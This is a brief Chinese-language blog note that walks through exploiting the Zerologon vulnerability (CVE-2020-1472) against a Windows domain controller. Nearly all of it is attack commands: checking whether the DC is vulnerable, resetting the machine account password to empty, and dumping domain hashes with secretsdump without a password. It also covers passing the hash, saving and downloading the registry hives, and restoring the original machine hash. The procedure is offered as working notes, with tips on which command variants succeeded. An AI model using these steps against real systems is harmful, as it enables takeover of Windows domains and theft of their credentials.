1. 程式人生 > 其它 >CVE-2020-1472

CVE-2020-1472

主要記下流程 我擦,這個洞mimikatz也可以搞 但是我就不記錄了

檢驗漏洞是否存在

https://github.com/SecuraBV/CVE-2020-1472
先獲取域控資訊

然後測試能否攻擊
python3 zerologon_tester.py DC_NETBIOS_NAME DC_IP_ADDR

將域控的機器賬號被重置為空

https://github.com/risksense/zerologon

使用空密碼dump域控上的hash

python3 secretsdump.py muxue.com/[email protected] -no-pass

pth過去

恢復域控機子hash

reg save HKLM\SYSTEM system.save
reg save HKLM\SAM sam.save
reg save HKLM\SECURITY security.save
lget system.save
lget sam.save
lget security.save
del /f system.save
del /f sam.save
del /f security.save

網上很多寫的都是get 有可能是因為impacket裡的wmiexec更新了 變成了lget

python3 secretsdump.py -sam sam.save -system system.save -security security.save LOCAL

然後還原hash
python3 reinstall_original_pw.py DC_NETBIOS_NAME DC_IP_ADDR ORIG_NT_HASH

檢視一下
secretsdump.py domain/administrator:pass@ip -just-dc-user "DC$"

我們可以比對一下上面的圖 已經成功修改回來了
記住是雙引號 包住機器名 我看別人寫的單引號 我這裡用單引號不成功